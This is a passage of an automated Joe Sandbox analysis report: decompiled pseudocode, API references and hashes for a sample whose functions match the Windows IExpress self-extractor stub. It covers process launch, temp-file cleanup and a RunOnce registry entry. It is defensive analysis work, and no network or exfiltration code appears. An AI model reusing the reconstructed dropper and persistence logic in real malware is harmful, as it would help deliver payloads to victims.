                                                                                                                                                                                                        • Opcode ID: 76484a29658772adbfc8f7a00629ec6fc43b02ba0daef3763356bbaad3a50aaf
                                                                                                                                                                                                        • Instruction ID: 1e441186a599603f649268efadbec812bac332ae4f16a88d602b65f832eac625
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76484a29658772adbfc8f7a00629ec6fc43b02ba0daef3763356bbaad3a50aaf
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C011E6B1600218ABC7245F7AAC4DBBB7F9AEF86374B104615B719D31D1CBB49845C6A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 675 1f3fef-1f4010 676 1f410a-1f411a call 1f6ce0 675->676 677 1f4016-1f403b CreateProcessA 675->677 678 1f40c4-1f4101 call 1f6285 GetLastError FormatMessageA call 1f44b9 677->678 679 1f4041-1f406e WaitForSingleObject GetExitCodeProcess 677->679 693 1f4106 678->693 682 1f4091 call 1f411b 679->682 683 1f4070-1f4077 679->683 688 1f4096-1f40b8 CloseHandle * 2 682->688 683->682 687 1f4079-1f407b 683->687 687->682 690 1f407d-1f4089 687->690 691 1f40ba-1f40c0 688->691 692 1f4108 688->692 690->682 694 1f408b 690->694 691->692 695 1f40c2 691->695 692->676 693->692 694->682 695->693
                                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                                        			E001F3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v524;
                                                                                                                                                                                                        				long _v528;
                                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t20;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				int _t25;
                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t45 = __edx;
                                                                                                                                                                                                        				_t20 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                        				_t39 = __ecx;
                                                                                                                                                                                                        				_t49 = 1;
                                                                                                                                                                                                        				_t22 = 0;
                                                                                                                                                                                                        				if(__ecx == 0) {
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					return E001F6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                        				if(_t25 == 0) {
                                                                                                                                                                                                        					 *0x1f9124 = E001F6285();
                                                                                                                                                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                        					_t45 = 0x4c4;
                                                                                                                                                                                                        					E001F44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					_t49 = 0;
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_t22 = _t49;
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                        				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                        				_t44 = _v528;
                                                                                                                                                                                                        				_t53 =  *0x1f8a28; // 0x0
                                                                                                                                                                                                        				if(_t53 == 0) {
                                                                                                                                                                                                        					_t34 =  *0x1f9a2c; // 0x0
                                                                                                                                                                                                        					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                        						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                        						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                        							 *0x1f9a2c = _t44;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E001F411B(_t34, _t44);
                                                                                                                                                                                                        				CloseHandle(_v544.hThread);
                                                                                                                                                                                                        				CloseHandle(_v544);
                                                                                                                                                                                                        				if(( *0x1f9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x001f3fef
                                                                                                                                                                                                        0x001f3ffa
                                                                                                                                                                                                        0x001f4001
                                                                                                                                                                                                        0x001f4008
                                                                                                                                                                                                        0x001f400a
                                                                                                                                                                                                        0x001f400b
                                                                                                                                                                                                        0x001f4010
                                                                                                                                                                                                        0x001f410a
                                                                                                                                                                                                        0x001f411a
                                                                                                                                                                                                        0x001f411a
                                                                                                                                                                                                        0x001f401c
                                                                                                                                                                                                        0x001f401d
                                                                                                                                                                                                        0x001f401e
                                                                                                                                                                                                        0x001f401f
                                                                                                                                                                                                        0x001f4033
                                                                                                                                                                                                        0x001f403b
                                                                                                                                                                                                        0x001f40ca
                                                                                                                                                                                                        0x001f40e9
                                                                                                                                                                                                        0x001f40f8
                                                                                                                                                                                                        0x001f4101
                                                                                                                                                                                                        0x001f4106
                                                                                                                                                                                                        0x001f4106
                                                                                                                                                                                                        0x001f4108
                                                                                                                                                                                                        0x001f4108
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4108
                                                                                                                                                                                                        0x001f4049
                                                                                                                                                                                                        0x001f405c
                                                                                                                                                                                                        0x001f4062
                                                                                                                                                                                                        0x001f4068
                                                                                                                                                                                                        0x001f406e
                                                                                                                                                                                                        0x001f4070
                                                                                                                                                                                                        0x001f4077
                                                                                                                                                                                                        0x001f407f
                                                                                                                                                                                                        0x001f4089
                                                                                                                                                                                                        0x001f408b
                                                                                                                                                                                                        0x001f408b
                                                                                                                                                                                                        0x001f4089
                                                                                                                                                                                                        0x001f4077
                                                                                                                                                                                                        0x001f4091
                                                                                                                                                                                                        0x001f409c
                                                                                                                                                                                                        0x001f40a8
                                                                                                                                                                                                        0x001f40b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f40c2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f40c2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateProcessA.KERNELBASE ref: 001F4033
                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001F4049
                                                                                                                                                                                                        • GetExitCodeProcess.KERNELBASE ref: 001F405C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 001F409C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 001F40A8
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 001F40DC
                                                                                                                                                                                                        • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 001F40E9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3183975587-0
                                                                                                                                                                                                        • Opcode ID: 67a6a9737e8ebf767127456787c998cd8681e565c2c982e05d54182bc8bfb055
                                                                                                                                                                                                        • Instruction ID: 09355e354546dae88dd03a58490d6c01fb268f4c4ce6f4ec3fa434fd03c4ec38
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67a6a9737e8ebf767127456787c998cd8681e565c2c982e05d54182bc8bfb055
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D431BF7164421CABEB209F65DC49FBB777CEBA4710F2001A9FA09E26A1CB345DC5CB21
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F51E5(void* __eflags) {
                                                                                                                                                                                                        				int _t5;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = E001F468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                        				if(_t28 != 0) {
                                                                                                                                                                                                        					if(E001F468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                        						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                        						if(_t5 != 0) {
                                                                                                                                                                                                        							_t6 = E001F44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                        							LocalFree(_t28);
                                                                                                                                                                                                        							if(_t6 != 6) {
                                                                                                                                                                                                        								 *0x1f9124 = 0x800704c7;
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								return 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *0x1f9124 = 0;
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						LocalFree(_t28);
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					E001F44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					LocalFree(_t28);
                                                                                                                                                                                                        					 *0x1f9124 = 0x80070714;
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E001F44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        				 *0x1f9124 = E001F6285();
                                                                                                                                                                                                        				goto L10;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        0x001f51fb
                                                                                                                                                                                                        0x001f5207
                                                                                                                                                                                                        0x001f520b
                                                                                                                                                                                                        0x001f523c
                                                                                                                                                                                                        0x001f5268
                                                                                                                                                                                                        0x001f5270
                                                                                                                                                                                                        0x001f528b
                                                                                                                                                                                                        0x001f5293
                                                                                                                                                                                                        0x001f529c
                                                                                                                                                                                                        0x001f52a6
                                                                                                                                                                                                        0x001f52b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f52b0
                                                                                                                                                                                                        0x001f529e
                                                                                                                                                                                                        0x001f5279
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f527b
                                                                                                                                                                                                        0x001f5273
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5273
                                                                                                                                                                                                        0x001f524a
                                                                                                                                                                                                        0x001f5250
                                                                                                                                                                                                        0x001f5256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5256
                                                                                                                                                                                                        0x001f5219
                                                                                                                                                                                                        0x001f5223
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46A0
                                                                                                                                                                                                          • Part of subcall function 001F468F: SizeofResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46A9
                                                                                                                                                                                                          • Part of subcall function 001F468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001F46C3
                                                                                                                                                                                                          • Part of subcall function 001F468F: LoadResource.KERNEL32(00000000,00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46CC
                                                                                                                                                                                                          • Part of subcall function 001F468F: LockResource.KERNEL32(00000000,?,001F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46D3
                                                                                                                                                                                                          • Part of subcall function 001F468F: memcpy_s.MSVCRT ref: 001F46E5
                                                                                                                                                                                                          • Part of subcall function 001F468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001F46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,001F2F4D,?,00000002,00000000), ref: 001F5201
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 001F5250
                                                                                                                                                                                                          • Part of subcall function 001F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001F4518
                                                                                                                                                                                                          • Part of subcall function 001F44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 001F4554
                                                                                                                                                                                                          • Part of subcall function 001F6285: GetLastError.KERNEL32(001F5BBC), ref: 001F6285
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$UPROMPT
                                                                                                                                                                                                        • API String ID: 957408736-2980973527
                                                                                                                                                                                                        • Opcode ID: 1e9bfdc998f96e6d0e5ce8a7c8779e3b878f37e47c0d21a1130c4cf1b83e2c1c
                                                                                                                                                                                                        • Instruction ID: 17fe7a0abf2e01b0de52576c8e2fcdf168b6644210483e68665f09b7e239d8cb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e9bfdc998f96e6d0e5ce8a7c8779e3b878f37e47c0d21a1130c4cf1b83e2c1c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C811EFF1204609FBE3246BB1AC49B3B619EEFD93A0B554129B746E6590EF7D8C408234
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                                                        			E001F52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				CHAR** _t31;
                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t28 = __edi;
                                                                                                                                                                                                        				_t22 = __ecx;
                                                                                                                                                                                                        				_t21 = __ebx;
                                                                                                                                                                                                        				_t9 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                        				_push(__esi);
                                                                                                                                                                                                        				_t31 =  *0x1f91e0; // 0x27e8ea8
                                                                                                                                                                                                        				if(_t31 != 0) {
                                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t29 = _t31;
                                                                                                                                                                                                        						if( *0x1f8a24 == 0 &&  *0x1f9a30 == 0) {
                                                                                                                                                                                                        							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                        							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t31 = _t31[1];
                                                                                                                                                                                                        						LocalFree( *_t29);
                                                                                                                                                                                                        						LocalFree(_t29);
                                                                                                                                                                                                        					} while (_t31 != 0);
                                                                                                                                                                                                        					_pop(_t28);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 =  *0x1f8a20; // 0x0
                                                                                                                                                                                                        				_pop(_t32);
                                                                                                                                                                                                        				if(_t11 != 0 &&  *0x1f8a24 == 0 &&  *0x1f9a30 == 0) {
                                                                                                                                                                                                        					_push(_t22);
                                                                                                                                                                                                        					E001F1781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                        					if(( *0x1f9a34 & 0x00000020) != 0) {
                                                                                                                                                                                                        						E001F65E8( &_v268);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                        					_t22 =  &_v268;
                                                                                                                                                                                                        					E001F2390( &_v268);
                                                                                                                                                                                                        					_t11 =  *0x1f8a20; // 0x0
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *0x1f9a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                        					_t11 = E001F1FE1(_t22); // executed
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *0x1f8a20 =  *0x1f8a20 & 0x00000000;
                                                                                                                                                                                                        				return E001F6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        0x001f52b6
                                                                                                                                                                                                        0x001f52b6
                                                                                                                                                                                                        0x001f52b6
                                                                                                                                                                                                        0x001f52c1
                                                                                                                                                                                                        0x001f52c8
                                                                                                                                                                                                        0x001f52cb
                                                                                                                                                                                                        0x001f52cc
                                                                                                                                                                                                        0x001f52d4
                                                                                                                                                                                                        0x001f52d6
                                                                                                                                                                                                        0x001f52d7
                                                                                                                                                                                                        0x001f52de
                                                                                                                                                                                                        0x001f52e0
                                                                                                                                                                                                        0x001f52f2
                                                                                                                                                                                                        0x001f52fa
                                                                                                                                                                                                        0x001f52fa
                                                                                                                                                                                                        0x001f5302
                                                                                                                                                                                                        0x001f5305
                                                                                                                                                                                                        0x001f530c
                                                                                                                                                                                                        0x001f5312
                                                                                                                                                                                                        0x001f5316
                                                                                                                                                                                                        0x001f5316
                                                                                                                                                                                                        0x001f5317
                                                                                                                                                                                                        0x001f531c
                                                                                                                                                                                                        0x001f531f
                                                                                                                                                                                                        0x001f5333
                                                                                                                                                                                                        0x001f5345
                                                                                                                                                                                                        0x001f5351
                                                                                                                                                                                                        0x001f5359
                                                                                                                                                                                                        0x001f5359
                                                                                                                                                                                                        0x001f5363
                                                                                                                                                                                                        0x001f5369
                                                                                                                                                                                                        0x001f536f
                                                                                                                                                                                                        0x001f5374
                                                                                                                                                                                                        0x001f5374
                                                                                                                                                                                                        0x001f5381
                                                                                                                                                                                                        0x001f5387
                                                                                                                                                                                                        0x001f5387
                                                                                                                                                                                                        0x001f538f
                                                                                                                                                                                                        0x001f53a0

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(027E8EA8,00000080,?,00000000), ref: 001F52F2
                                                                                                                                                                                                        • DeleteFileA.KERNELBASE(027E8EA8), ref: 001F52FA
                                                                                                                                                                                                        • LocalFree.KERNEL32(027E8EA8,?,00000000), ref: 001F5305
                                                                                                                                                                                                        • LocalFree.KERNEL32(027E8EA8), ref: 001F530C
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(001F11FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 001F5363
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 001F5334
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                        • API String ID: 2833751637-1610346413
                                                                                                                                                                                                        • Opcode ID: 6488344eb903f0cd93bad8c90eba8ec26ff6023dce9e6dd3e71711b3f59048ef
                                                                                                                                                                                                        • Instruction ID: a9703890b4faf41e0429b5fa937ffdc67fd4da7b5c9060b86d774768500e958e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6488344eb903f0cd93bad8c90eba8ec26ff6023dce9e6dd3e71711b3f59048ef
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1421AE3190461CDBDB20AB28ED09B7977B5FB14794F440259FB86579A0CFB59CD4CB40
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F1FE1(void* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				if( *0x1f8530 != 0) {
                                                                                                                                                                                                        					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                        					if(_t4 == 0) {
                                                                                                                                                                                                        						RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
                                                                                                                                                                                                        						return RegCloseKey(_v8);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        0x001f1fee
                                                                                                                                                                                                        0x001f2005
                                                                                                                                                                                                        0x001f200d
                                                                                                                                                                                                        0x001f2017
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2020
                                                                                                                                                                                                        0x001f200d
                                                                                                                                                                                                        0x001f2029

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,001F538C,?,?,001F538C), ref: 001F2005
                                                                                                                                                                                                        • RegDeleteValueA.KERNELBASE(001F538C,wextract_cleanup2,?,?,001F538C), ref: 001F2017
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(001F538C,?,?,001F538C), ref: 001F2020
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
                                                                                                                                                                                                        • API String ID: 849931509-3354236729
                                                                                                                                                                                                        • Opcode ID: a9f2dba674427973f58beeb8a5a5a3cb516346bbd9ab9f2fc192389c4aece37c
                                                                                                                                                                                                        • Instruction ID: a34f4a4a7d3edb8d0c42ecd260090ea173d507e07f7669b5783ea8ab90114c2c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9f2dba674427973f58beeb8a5a5a3cb516346bbd9ab9f2fc192389c4aece37c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5EE04F7155031CBBDB219B90FC0AF797B2AEB01740F500194FA08A04A0EF755A94D605
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E001F4CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				long _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				long _t35;
                                                                                                                                                                                                        				long _t36;
                                                                                                                                                                                                        				struct HWND__* _t37;
                                                                                                                                                                                                        				long _t38;
                                                                                                                                                                                                        				long _t39;
                                                                                                                                                                                                        				long _t41;
                                                                                                                                                                                                        				long _t44;
                                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                                        				long _t46;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				long _t51;
                                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                                        				long _t59;
                                                                                                                                                                                                        				char* _t63;
                                                                                                                                                                                                        				long _t64;
                                                                                                                                                                                                        				CHAR* _t71;
                                                                                                                                                                                                        				CHAR* _t74;
                                                                                                                                                                                                        				int _t75;
                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t69 = __edx;
                                                                                                                                                                                                        				_t29 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                        				_v8 = _t30;
                                                                                                                                                                                                        				_t75 = _a8;
                                                                                                                                                                                                        				if( *0x1f91d8 == 0) {
                                                                                                                                                                                                        					_t32 = _a4;
                                                                                                                                                                                                        					__eflags = _t32;
                                                                                                                                                                                                        					if(_t32 == 0) {
                                                                                                                                                                                                        						_t33 = E001F4E99(_t75);
                                                                                                                                                                                                        						L35:
                                                                                                                                                                                                        						return E001F6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t35 = _t32 - 1;
                                                                                                                                                                                                        					__eflags = _t35;
                                                                                                                                                                                                        					if(_t35 == 0) {
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						_t33 = 0;
                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t36 = _t35 - 1;
                                                                                                                                                                                                        					__eflags = _t36;
                                                                                                                                                                                                        					if(_t36 == 0) {
                                                                                                                                                                                                        						_t37 =  *0x1f8584; // 0x0
                                                                                                                                                                                                        						__eflags = _t37;
                                                                                                                                                                                                        						if(_t37 != 0) {
                                                                                                                                                                                                        							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t54 = 0x1f91e4;
                                                                                                                                                                                                        						_t58 = 0x1f91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t38 =  *_t58;
                                                                                                                                                                                                        							_t58 =  &(_t58[1]);
                                                                                                                                                                                                        							__eflags = _t38;
                                                                                                                                                                                                        						} while (_t38 != 0);
                                                                                                                                                                                                        						_t59 = _t58 - 0x1f91e5;
                                                                                                                                                                                                        						__eflags = _t59;
                                                                                                                                                                                                        						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                        						_t73 =  &(_t71[1]);
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t39 =  *_t71;
